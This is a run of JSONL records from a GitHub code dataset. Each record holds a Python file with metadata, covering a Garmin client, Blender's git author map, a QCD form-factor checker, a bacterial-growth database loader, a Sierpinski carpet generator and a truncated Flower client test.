print(f'Making call to {url}')\n response = self.session.get(url)\n return response.json()\n", "repo_name": "oxhacks/goalposts", "sub_path": "goalposts/clients.py", "file_name": "clients.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "garminexport.garminclient.GarminClient", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": "garminexport.garminclient.require_session", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "15879873209", "text": "__all__ = (\n \"sha1_authors_map\",\n)\n\nfrom typing import (\n Dict,\n Tuple,\n)\n\n\ndef sha1_authors_map() -> Dict[bytes, Tuple[str, ...]]:\n \"\"\"\n Return SHA1 to authors map.\n \"\"\"\n # Mapping from a commit hash to additional authors.\n # Fully overwrite authors gathered from git commit info.\n # Intended usage: Correction of info stored in git commit itself.\n # Note that the names of the authors here are assumed fully valid and usable as-is.\n return {\n # Format: {full_git_hash: (tuple, of, authors),}.\n # Author was: `blender `.\n b\"ba3d49225c9ff3514fb87ae5d692baefe5edec30\": (\"Sergey Sharybin \", ),\n # Author was: `Author Name `.\n b\"4b6a4b5bc25bce10367dffadf7718e373f81f299\": (\"Antonio Vazquez \", ),\n }\n", "repo_name": "blender/blender", "sub_path": "tools/utils/git_data_sha1_override_authors.py", "file_name": "git_data_sha1_override_authors.py", "file_ext": "py", "file_size_in_byte": 859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "8215245515", "text": "from __future__ import print_function\nimport os, sys, argparse, shutil, datetime, time\nimport numpy as np\nnp.set_printoptions(linewidth=180)\nimport tables as h5\nimport warnings\nwarnings.simplefilter('ignore', h5.NaturalNameWarning)\nfrom glob import glob\nfmt = '%Y-%m-%d %H:%M:%S'\n\n'''\n NUCLEON_ELASTIC_FF IMPORTS\n'''\nsys.path.append(os.path.join(os.path.dirname(__file__)))\nsys.path.append(os.path.join(os.path.dirname(__file__),'area51_files'))\nimport importlib\nimport c51_mdwf_hisq as c51\nimport utils\nimport sources\nens,stream = c51.ens_base()\nens_s = ens+'_'+stream\n\narea51 = importlib.import_module(ens)\nparams = area51.params\nparams['machine'] = c51.machine\nparams['ENS_LONG'] = c51.ens_long[ens]\nparams['ENS_S'] = ens_s\nparams['STREAM'] = stream\n\nprint('ENSEMBLE:',ens_s)\n\n'''\n COMMAND LINE ARG PARSER\n'''\nparser = argparse.ArgumentParser(description='get spec data from h5 files')\nparser.add_argument('cfgs', nargs='+',type=int,help='cfgs: ci [cf dc]')\nparser.add_argument('-t','--t_sep',nargs='+',type=int,help='values of t_sep [default = all]')\nparser.add_argument('--src_set', nargs=3,type=int,help='specify si sf ds')\nparser.add_argument('-s','--src', type=str,help='src [xXyYzZtT] None=All')\nparser.add_argument('-o', default=False,action='store_const',const=True, help='overwrite? [%(default)s]')\nparser.add_argument('--move', default=False,action='store_const',const=True, help='move bad files? [%(default)s]')\nparser.add_argument('-v', default=True, action='store_const',const=False,help='verbose? [%(default)s]')\nparser.add_argument('--collect', default=False,action='store_const',const=True, help='try collecting from ff_4D files? [%(default)s]')\nparser.add_argument('--curr_4D', default=False,action='store_const',const=True, help='use 4D current selection? [%(default)s]')\nargs = parser.parse_args()\nprint('Arguments passed')\nprint(args)\nprint('')\n\ndtype = np.complex64\ndata_dir = c51.data_dir % params\nutils.ensure_dirExists(data_dir)\n\nif 'si' in params and 'sf' in params and 'ds' in params:\n tmp_params = dict()\n tmp_params['si'] = params['si']\n tmp_params['sf'] = params['sf']\n tmp_params['ds'] = params['ds']\n params = sources.src_start_stop(params,ens,stream)\n params['si'] = tmp_params['si']\n params['sf'] = tmp_params['sf']\n params['ds'] = tmp_params['ds']\nelse:\n params = sources.src_start_stop(params,ens,stream)\nif args.src_set:# override src index in sources and area51 files for collection\n params['si'] = args.src_set[0]\n params['sf'] = args.src_set[1]\n params['ds'] = args.src_set[2]\nsrc_ext = \"%d-%d\" %(params['si'],params['sf'])\nparams['SRC_SET'] = src_ext\ncfgs_run,srcs = utils.parse_cfg_src_argument(args.cfgs,args.src,params)\nsmr = 'gf'+params['FLOW_TIME']+'_w'+params['WF_S']+'_n'+params['WF_N']\nval = smr+'_M5'+params['M5']+'_L5'+params['L5']+'_a'+params['alpha5']\nval_p = val.replace('.','p')\n\nmv_l = params['MV_L']\nparams['MQ'] = mv_l\n\nflav_spin = []\nfor flav in params['flavs']:\n for spin in params['spins']:\n flav_spin.append(flav+'_'+spin)\n''' ONLY doing snk_mom 0 0 0 now '''\nsnk_mom = params['snk_mom'][0]\nm0,m1,m2 = snk_mom.split()\nparams['M0']=m0\nparams['M1']=m1\nparams['M2']=m2\nparams['MOM'] = 'px%spy%spz%s' %(m0,m1,m2)\n\nif args.t_sep == None:\n pass\nelse:\n params['t_seps'] = args.t_sep\nprint('getting t_sep values')\nprint(params['t_seps'])\n\n# If 0-mom files are missing, we can reconstruct from the 4D files\n# but missing the T12, T34 and CHROMO_MAG operators\nif args.collect and not args.curr_4D:\n sys.exit('to collect from 4D files, we must restrict the currents with --curr_4D')\nif args.curr_4D:\n currents = params['curr_4d']\nelse:\n currents = params['curr_0p']\n\nmissing_ff_files = []\ncollect_files = []\nfor cfg in cfgs_run:\n no = str(cfg)\n print(no)\n try:\n f5 = h5.open_file(data_dir+'/'+ens_s+'_'+no+'_srcs'+src_ext+'.h5','r')\n have_data_cfg = True\n except:\n have_data_cfg = False\n params['CFG'] = no\n params = c51.ensemble(params)\n for tsep in params['t_seps']:\n params['T_SEP'] = tsep\n params['N_SEQ'] = len(srcs[cfg])\n if ens_s == 'a15m310Lindvdl_a':\n params['N_SEQ'] = 1\n for src in srcs[cfg]:\n params['SRC'] = src\n src_split = sources.src_split(src)\n t_src = src.split('t')[1]\n ff_name = c51.names['formfac'] % params\n ff_file = params['formfac'] +'/'+ ff_name+'.h5'\n if not have_data_cfg:\n if os.path.exists(ff_file):\n collect_files.append(ff_file)\n else:\n missing_ff_files.append(ff_file)\n else:\n mq = params['MQ'].replace('.','p')\n ff_dir = '/'+val_p+'/formfac/ml'+mq\n for corr in params['particles']:\n dt = str(tsep)\n if '_np' in corr:\n dt = '-'+dt\n for fs in flav_spin:\n ff_out = corr+'_'+fs+'_tsep_'+dt+'_sink_mom_px0_py0_pz0'\n for curr in currents:\n p_lst = ['px0_py0_pz0']\n for mom in p_lst:\n h5_data = ff_dir+'/'+ff_out+'/'+curr+'/'+mom+'/'+src\n if h5_data not in f5.get_node('/'):\n if os.path.exists(ff_file) and ff_file not in collect_files:\n collect_files.append(ff_file)\n elif not os.path.exists(ff_file) and ff_file not in missing_ff_files:\n missing_ff_files.append(ff_file)\n elif not os.path.exists(ff_file) and ff_file in missing_ff_files:\n pass\n elif os.path.exists(ff_file) and ff_file in collect_files:\n pass\n else:\n print('CONFUSED')\n print(os.path.exists(ff_file),ff_file.split('/')[-1])\n if have_data_cfg: \n f5.close()\n else:\n print('missing ',data_dir+'/'+ens_s+'_'+no+'_srcs'+src_ext+'.h5')\n\nif len(missing_ff_files) > 0:\n print('missing %d formfac files' %(len(missing_ff_files)))\n tmp = open('missing_check_formfac_Srcs'+src_ext+'.lst','w')\n for f in missing_ff_files:\n no,ff = f.split('/')[-2],f.split('/')[-1]\n tmp.write(no+'/'+ff+'\\n')\n tmp.close()\n\nif len(collect_files) > 0:\n print('collect %d data sets' %(len(collect_files)))\n time.sleep(2)\n tmp = open('collect_formfac_Srcs'+src_ext+'.lst','w')\n for f in collect_files:\n no,ff = f.split('/')[-2],f.split('/')[-1]\n #print(no,ff)\n tmp.write(no+'/'+ff+'\\n')\n tmp.close()\n\n''' turn off for now as we may also be missing spec files\nif args.collect:\n for ff in missing_ff_files:\n ff_4D = ff.replace('formfac','formfac_4D')\n ff_4D_tslice = ff.replace('formfac','formfac_4D_tslice')\n if os.path.exists(ff_4D) or os.path.exists(ff_4D_tslice):\n no = ff_4D.split(ens_s)[2].split('_')[1]\n src = ff_4D.split('_')[-2]\n src_split = sources.src_split(src)\n x0,y0,z0,t0 = sources.xyzt(src)\n tsep = ff_4D.split('_dt')[1].split('_')[0]\n mq = params['MQ'].replace('.','p')\n ff_dir = '/'+val_p+'/formfac/ml'+mq\n for corr in params['particles']:\n dt = str(tsep)\n if '_np' in corr:\n dt = '-'+dt\n for fs in flav_spin:\n ff_out = corr+'_'+fs+'_tsep_'+dt+'_sink_mom_px0_py0_pz0'\n for curr in currents:\n ff_4D_dir = '/'+corr+'_'+fs+'_t0_'+t0+'_tsep_'+dt+'_sink_mom_px0_py0_pz0/'+curr+'/'+src_split+'/4D_correlator/local_current'\n if os.path.exists(ff_4D):\n file_4D = h5.open_file(ff_4D,'r')\n data_4D = file_4D.get_node(ff_4D_dir)\n print(no,src,curr,dt,data_4D.shape)\n file_4D.close()\n'''\n", "repo_name": "callat-qcd/nucleon_elastic_FF", "sub_path": "scripts/check_formfac.py", "file_name": "check_formfac.py", "file_ext": "py", "file_size_in_byte": 8292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.set_printoptions", "line_number": 4, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 7, "usage_type": "call"}, {"api_name": "tables.NaturalNameWarning", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.ens_base", "line_number": 20, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 23, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.machine", "line_number": 25, "usage_type": "attribute"}, {"api_name": "c51_mdwf_hisq.ens_long", "line_number": 26, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 50, "usage_type": "attribute"}, {"api_name": "c51_mdwf_hisq.data_dir", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.ensure_dirExists", "line_number": 52, "usage_type": "call"}, {"api_name": "sources.src_start_stop", "line_number": 59, "usage_type": "call"}, {"api_name": "sources.src_start_stop", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.parse_cfg_src_argument", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 101, "usage_type": "call"}, {"api_name": "tables.open_file", "line_number": 113, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.ensemble", "line_number": 118, "usage_type": "call"}, {"api_name": "sources.src_split", "line_number": 126, "usage_type": "call"}, {"api_name": "c51_mdwf_hisq.names", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "12786849402", "text": "import os\nimport pandas as pd\n\nfrom constants import *\n\nfrom utils import findOccurrences, transformStringIntoList\nfrom import_into_database.yml_functions import read_yml\nfrom import_into_database.bash_functions import clusterHeaders, getFiles\nimport db_functions as db\n\ndef populate_db(args):\n '''\n This function reads the yml file with the information to populate the database and parses it depending on the keys of the values.\n It calls functions to set the biological replicate/perturbation/replicate ids or gets them from the yml file\n It calls db functions to introduce the information in the corresponding db tables\n\n :param args: user input choice\n '''\n info_file = args.info_file\n info = read_yml(info_file)\n\n if 'STUDY' in info:\n study = {\n 'studyName': info['STUDY'][0]['NAME'],\n 'studyDescription': info['STUDY'][0]['DESCRIPTION']\n }\n study_filtered = {k: v for k, v in study.items() if v is not None}\n if len(study_filtered)>0:\n study_id = db.addRecord('Study', study_filtered)\n print('\\nSTUDY ID: ', study_id)\n else: \n print('You must introduce some study information')\n exit()\n \n elif 'STUDY_ID' in info:\n study_id = info['STUDY_ID']\n print('\\nSTUDY ID: ', study_id)\n \n\n if 'BIOLOGICAL_REPLICATE' in info:\n biological_replicates = info['BIOLOGICAL_REPLICATE'] \n for biological_replicate in biological_replicates:\n # ------------------------------------------------------------------------------------\n # REACTOR ==> REACTOR_ID\n reactor = {\n 'reactorName': biological_replicate['REACTOR']['NAME']['value'],\n 'volume': \"{:.2f}\".format(biological_replicate['REACTOR']['VOLUME']['value']),\n 'atmosphere': \"{:.2f}\".format(biological_replicate['REACTOR']['ATMOSPHERE']['value']),\n 'stirring_speed': \"{:.2f}\".format(biological_replicate['REACTOR']['STIRRING_SPEED']['value']),\n 'reactorMode': biological_replicate['REACTOR']['MODE']['value'],\n 'reactorDescription': biological_replicate['REACTOR']['DESCRIPTION']['value'],\n }\n reactor_filtered = {k: v for k, v in reactor.items() if v is not None}\n if len(reactor_filtered)>0: reactor_id = db.addRecord('Reactor',reactor_filtered)\n else: reactor_id=None\n print('\\tREACTOR ID: ', reactor_id)\n \n # ------------------------------------------------------------------------------------\n # PRECULTIVATION ==> PRECULTIVATION_ID \n precultivation_id = None\n print('\\tPRECULTIVATION ID: ', precultivation_id)\n \n # ------------------------------------------------------------------------------------\n # MEDIA ==> MEDIA_ID\n if biological_replicate['MEDIA']['MEDIA_PATH']['value']:\n media_file = os.path.abspath(biological_replicate['MEDIA']['MEDIA_PATH']['value'])\n path_end = max(findOccurrences(media_file, \"/\"))\n media_file_name = media_file[path_end+1:]\n\n media_analysis_file = PROJECT_DIRECTORY + MEDIA_ANALYSIS_FILE\n media_args = [PROJECT_DIRECTORY, media_file, media_file_name]\n mediaFiles = getFiles(media_analysis_file, media_args, MEDIA_LIST)\n \n for i, f in enumerate(mediaFiles):\n media = {\n 'mediaName': biological_replicate['MEDIA']['NAME']['value'],\n 'mediaFile': f\n }\n media_filtered = {k: v for k, v in media.items() if v is not None}\n \n if len(media_filtered)>0: media_id = db.addRecord('Media',media_filtered)\n else: media_id=None\n \n print('\\tMEDIA ID: ', media_id)\n \n # ------------------------------------------------------------------------------------\n # ==> BiologicalReplicate table\n biol_rep_positions = transformStringIntoList(biological_replicate['PLATE']['POSITION']['value'], ',')\n biol_rep_dir = transformStringIntoList(biological_replicate['FILES']['value'], ',')\n\n for i, biol_rep_position in enumerate(biol_rep_positions):\n \n biological_id = setBiologicalReplicateId(study_id)\n \n biol_rep = {\n 'studyId': study_id,\n 'biologicalReplicateId': biological_id,\n 'reactorId': reactor_id,\n 'precultivationId': precultivation_id,\n 'mediaId': media_id,\n 'biologicalReplicateName': biological_replicate['NAME']['value'],\n 'plateId': biological_replicate['PLATE']['ID']['value'],\n 'platePosition': biol_rep_position,\n 'blank': biological_replicate['BLANK']['value'],\n 'inoculumConcentration': \"{:.2f}\".format(biological_replicate['INOCULUM_CONCENTRATION']['value']),\n 'inoculumVolume': \"{:.2f}\".format(biological_replicate['INOCULUM_VOLUME']['value']),\n 'initialPh': \"{:.2f}\".format(biological_replicate['INITIAL_PH']),\n 'initialTemperature': \"{:.2f}\".format(biological_replicate['INITIAL_TEMPERATURE']['value']),\n 'carbonSource': biological_replicate['CARBON_SOURCE']['value'],\n 'antibiotic': biological_replicate['ANTIBIOTIC']['value'],\n 'biologicalReplicateDescription': biological_replicate['DESCRIPTION']['value']\n }\n \n biological_replicate_filtered = {k: v for k, v in biol_rep.items() if v is not None}\n db.addRecord('BiologicalReplicate', biological_replicate_filtered)\n print('\\nBIOLOGICAL_REPLICATE ID: ', biological_id)\n\n # ------------------------------------------------------------------------------------\n # BACTERIA ==> if BLANK=False\n if biological_replicate['BLANK']['value'] == 0:\n bacterias = biological_replicate['BACTERIA']\n for bacteria in bacterias:\n bact = {\n 'bacteriaGenus': bacteria['GENUS'],\n 'bacteriaSpecies': bacteria['SPECIES'],\n 'bacteriaStrain': bacteria['STRAIN']\n }\n bacteria_filtered = {k: v for k, v in bact.items() if v is not None}\n\n if len(bacteria_filtered)>0: \n bacteria_id = db.addRecord('Bacteria',bacteria_filtered)\n community = {\n 'bacteriaId': bacteria_id,\n 'biologicalReplicateId': biological_id\n }\n community_filtered = {k: v for k, v in community.items() if v is not None}\n db.addRecord('BacteriaCommunity',community_filtered) \n\n ### Files analysis\n print(biol_rep_dir[i])\n if biol_rep_dir[i]:\n files_dir = os.path.abspath(biol_rep_dir[i]) + '/'\n\n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir, biological_id]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST)\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n \n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, perturbation_id=None)\n \n elif 'BIOLOGICAL_ID' in info:\n biological_id = info['BIOLOGICAL_ID']\n print('\\nBIOLOGICAL_REPLICATE ID: ', biological_id)\n \n \n if 'PERTURBATION' in info:\n perturbations = info['PERTURBATION']\n for perturbation in perturbations:\n\n pert_positions = transformStringIntoList(perturbation['PLATE']['POSITION']['value'], ',')\n pert_dir = transformStringIntoList(perturbation['FILES']['value'], ',')\n\n for i, pert_position in enumerate(pert_positions):\n \n perturbation_id = setPerturbationId(biological_id)\n pert = {\n 'perturbationId': perturbation_id,\n 'biologicalReplicateId': biological_id,\n 'plateId': perturbation['PLATE']['ID']['value'],\n 'platePosition': pert_position,\n 'property': perturbation['PROPERTY']['value'],\n 'newValue': perturbation['NEW_VALUE']['value'],\n 'startTime': perturbation['STARTING_TIME']['value'],\n 'endTime': perturbation['ENDING_TIME']['value'],\n 'perturbationDescription': perturbation['DESCRIPTION']['value']\n }\n perturbation_filtered = {k: v for k, v in pert.items() if v is not None}\n db.addRecord('Perturbation', perturbation_filtered)\n print('\\nPERTURBATION ID: ', perturbation_id)\n\n ### Files analysis\n print(pert_dir[i])\n if pert_dir[i]:\n files_dir = os.path.abspath(pert_dir[i]) + '/'\n \n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir, biological_id, perturbation_id]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST) #this will generate the new HEADERS_FILE\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n\n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, perturbation_id=perturbation_id)\n \n elif 'PERTURBATION_ID' in info:\n perturbation_id = info['PERTURBATION_ID']\n print('\\nPERTURBATION ID: ', perturbation_id)\n \n \n if 'FILES' in info:\n files_dir = os.path.abspath(info['FILES']) + '/'\n\n biol_rep_analysis_file = PROJECT_DIRECTORY + BIOLOGICAL_REPLICATE_ANALYSIS_FILE\n biol_rep_args = [PROJECT_DIRECTORY, files_dir]\n biol_rep_files = getFiles(biol_rep_analysis_file, biol_rep_args, BIOLOGICAL_REPLICATES_LIST) #this will generate the new HEADERS_FILE\n\n headers_dict = clusterHeaders(PROJECT_DIRECTORY + HEADERS_FILE)\n \n addReplicates(headers_dict, biol_rep_files, biological_id=biological_id, perturbation_id=perturbation_id)\n\ndef setBiologicalReplicateId(study_id):\n '''\n This function sets up the biological replicate id depending on the study id\n \n :parama study_id in which the biological replicate is added\n :return biological_id\n '''\n number_biol_rep = db.countRecords('BiologicalReplicate', {'studyId': str(study_id)})\n biological_id = str(int(study_id)*100 + number_biol_rep + 1)\n return biological_id\n\ndef setPerturbationId(biological_id):\n '''\n This function sets up the perturbation id depending on the biological replicate id\n \n :parama biological_id in which the perturbation is added\n :return perturbation_id\n '''\n number_pert = db.countRecords('Perturbation', {'biologicalReplicateId': str(biological_id)})\n perturbation_id = biological_id + '.' + str(number_pert + 1)\n return perturbation_id\n\ndef addReplicates(headers, files, biological_id, perturbation_id):\n '''\n This function saves each file as a technical replicate\n For this, it calculates the replicate id with the biological_id providad (and the perturbation_id)\n Separates the file data into abundances/ph/metabolites\n Saves in txt file and in the db table\n\n :param headers: dict with categories as keys to separate df into sub_dfs\n :param files\n :param biological_id where replicates are added\n :param perturbation_id where replicates are added\n '''\n if perturbation_id == None:\n id = biological_id\n number_rep = db.countRecords('TechnicalReplicate', {'biologicalReplicateId': str(id)})\n else:\n id = perturbation_id\n number_rep = db.countRecords('TechnicalReplicate', {'perturbationId': str(id)})\n\n print('\\n- The ID in which the replicate files will be added is: ',id)\n print('- The number of replicates already in that id: ',number_rep)\n for i, f in enumerate(files):\n technical_id = str(id) + '_' + str(number_rep + i + 1)\n \n #Get directory of the provided paths\n path_end = max(findOccurrences(f, \"/\"))\n path = f[:path_end+1]\n\n #Read file with all the data\n df = pd.read_table(f, sep=\" \")\n \n growth_data = df[df.columns.intersection(headers['abundance'])]\n growth_data = growth_data.round({'OD': 3})\n \n ph_data = df[df.columns.intersection(headers['ph'])]\n ph_data = ph_data.round({'pH': 3})\n\n metabolites_data = df[df.columns.intersection(headers['metabolites'])]\n\n # If len(df.columns) <= 1 (only time column), we do not save it\n if len(growth_data.columns) > 1:\n g_path = path+'abundance_file.txt'\n growth_data.to_csv(g_path, sep=\" \", index=False)\n else: g_path = None\n \n if len(ph_data.columns) > 1: \n p_path = path+'pH_file.txt'\n ph_data.to_csv(p_path, sep=\" \", index=False)\n else: p_path = None\n\n if len(metabolites_data.columns) > 1:\n m_path = path+'metabolites_file.txt'\n metabolites_data.to_csv(m_path, sep=\" \", index=False)\n else: m_path = None\n\n rep = {\n 'technicalReplicateId': technical_id,\n 'biologicalReplicateId': biological_id,\n 'perturbationId': perturbation_id,\n 'abundanceFile': g_path,\n 'metabolitesFile': m_path,\n 'phFile': p_path\n }\n \n replicate_filtered = {k: v for k, v in rep.items() if v is not None}\n db.addRecord('TechnicalReplicate', replicate_filtered)", "repo_name": "jcasadogp/bacterial_growth", "sub_path": "src/import_into_database/populate_db.py", "file_name": "populate_db.py", "file_ext": "py", "file_size_in_byte": 14456, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "import_into_database.yml_functions.read_yml", "line_number": 20, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 29, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.findOccurrences", "line_number": 67, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 72, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 88, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 89, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 115, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 131, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 146, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 161, "usage_type": "call"}, {"api_name": "utils.transformStringIntoList", "line_number": 162, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 189, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "import_into_database.bash_functions.getFiles", "line_number": 205, "usage_type": "call"}, {"api_name": "import_into_database.bash_functions.clusterHeaders", "line_number": 207, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 218, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 229, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 247, "usage_type": "call"}, {"api_name": "db_functions.countRecords", "line_number": 250, "usage_type": "call"}, {"api_name": "utils.findOccurrences", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 262, "usage_type": "call"}, {"api_name": "db_functions.addRecord", "line_number": 298, "usage_type": "call"}]} +{"seq_id": "16895079212", "text": "import numpy\r\nimport cv2\r\n\r\ndef RemoveSquare(image, step=1, start=(0, 0), stop=None):\r\n if stop is None:\r\n stop = image.shape\r\n size = (stop[0] - start[0]) // 3\r\n center = (start[0] + size, start[1] + size)\r\n image[center[0] : center[0] + size, center[1] : center[1] + size] = 0\r\n if step == 1:\r\n return image\r\n for x in range(start[0], stop[0], size):\r\n for y in range(start[1], stop[1], size):\r\n if x != center[0] or y != center[1]:\r\n image = RemoveSquare(image, step - 1, (x, y), (x + size, y + size))\r\n return image\r\n\r\ndef CreateCarpet(steps, pixel_size=1):\r\n size = pixel_size * (3 ** steps)\r\n carpet = numpy.ones((size, size))\r\n return RemoveSquare(carpet, steps)\r\n\r\nif __name__ == \"__main__\":\r\n carpet = CreateCarpet(5, 1)\r\n cv2.imshow(\"Carpet\", carpet)\r\n", "repo_name": "hilmiyafia/sierpinski-carpet", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 845, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "7285436192", "text": "from typing import Dict, Tuple\n\nfrom flwr.common import (\n Config,\n EvaluateIns,\n EvaluateRes,\n FitIns,\n FitRes,\n GetParametersIns,\n GetParametersRes,\n GetPropertiesIns,\n GetPropertiesRes,\n NDArrays,\n Scalar,\n)\n\nfrom .app import start_client, start_numpy_client\nfrom .client import Client\nfrom .numpy_client import NumPyClient\n\n\nclass PlainClient(Client):\n \"\"\"Client implementation extending the low-level Client.\"\"\"\n\n def get_properties(self, ins: GetPropertiesIns) -> GetPropertiesRes:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def get_parameters(self, ins: GetParametersIns) -> GetParametersRes:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def fit(self, ins: FitIns) -> FitRes:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def evaluate(self, ins: EvaluateIns) -> EvaluateRes:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n\nclass NeedsWrappingClient(NumPyClient):\n \"\"\"Client implementation extending the high-level NumPyClient.\"\"\"\n\n def get_properties(self, config: Config) -> Dict[str, Scalar]:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def get_parameters(self, config: Config) -> NDArrays:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def fit(\n self, parameters: NDArrays, config: Config\n ) -> Tuple[NDArrays, int, Dict[str, Scalar]]:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n def evaluate(\n self, parameters: NDArrays, config: Config\n ) -> Tuple[float, int, Dict[str, Scalar]]:\n \"\"\"Raise an Exception because this method is not expected to be called.\"\"\"\n raise Exception()\n\n\ndef test_to_client_with_client() -> None:\n \"\"\"Test to_client.\"\"\"\n client = PlainClient().to_client()\n\n # Assert\n assert isinstance(client, Client)\n\n\ndef test_to_client_with_numpyclient() -> None:\n \"\"\"Test fit_clients.\"\"\"\n client = NeedsWrappingClient().to_client()\n\n # Assert\n assert isinstance(client, Client)\n\n\ndef test_start_client_transport_invalid() -> None:\n \"\"\"Test start_client(..., transport=...).\"\"\"\n # Prepare\n client: Client = PlainClient()\n invalid_transport = \"invalid-transport-value\"\n\n # Execute\n try:\n start_client(\n server_address=\"0.0.0.0:8080\", client=client, transport=invalid_transport\n 